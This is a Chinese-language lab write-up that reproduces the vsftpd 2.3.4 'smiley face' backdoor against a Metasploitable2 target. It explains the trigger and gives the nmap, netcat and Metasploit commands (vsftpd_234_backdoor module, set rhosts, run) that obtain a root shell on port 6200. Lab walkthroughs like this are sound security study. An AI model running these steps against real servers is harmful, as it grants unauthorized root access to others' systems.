Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞)
- 一、原理
- 二、复现准备
- 三、漏洞复现
- 四、Metasploit利用脚本复现
一、原理
- vsftpd 是“ very secure FTP daemon ”的缩写,安全性是它的一个最大的特点。 vsftpd是一个 UNIX 类操作系统上运行的服务器的名字,它可以运行在诸如 Linux 、 BSD 、 Solaris 、HP UNIX 等系统上面,是一个完全免费的、开放源代码的 ftp 服务器软件,支持很多其他的FTP 服务器所不支持的特征
- 笑脸漏洞:这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:)”,密码任意,即可运行vsf_sysutil_extra():打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞
二、复现准备
- 靶机:Metasplotable2-Linux - 192.168.9.147
- 攻击机:Kali - 192.168.9.148
三、漏洞复现
-  使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4 
  
-  利用 netcat,连接靶机的21端口,输入user带有:),pass随便输入
  
-  nmap扫描端口6200,观察端口打开情况:已经开启 
  
-  用 nc连接6200端口,成功以root身份登入
  
四、Metasploit利用脚本复现
- 命令行输入msfconsole打开Metasploit
msfconsole 

- 搜索vsftpd2.3.4的漏洞脚本
search vsftpd 2.3.4

- 使用 use命令,使用漏洞脚本
use 0
# 也可以是 use exploit/unix/ftp/vsftpd_234_backdoor

-  查看漏洞主要信息, yes选项是我们需要设置的,RPORT已经设置了,还需要设置RHOSTS
  
-  设置目标主机 
set rhosts 192.168.9.147

- 攻击
run
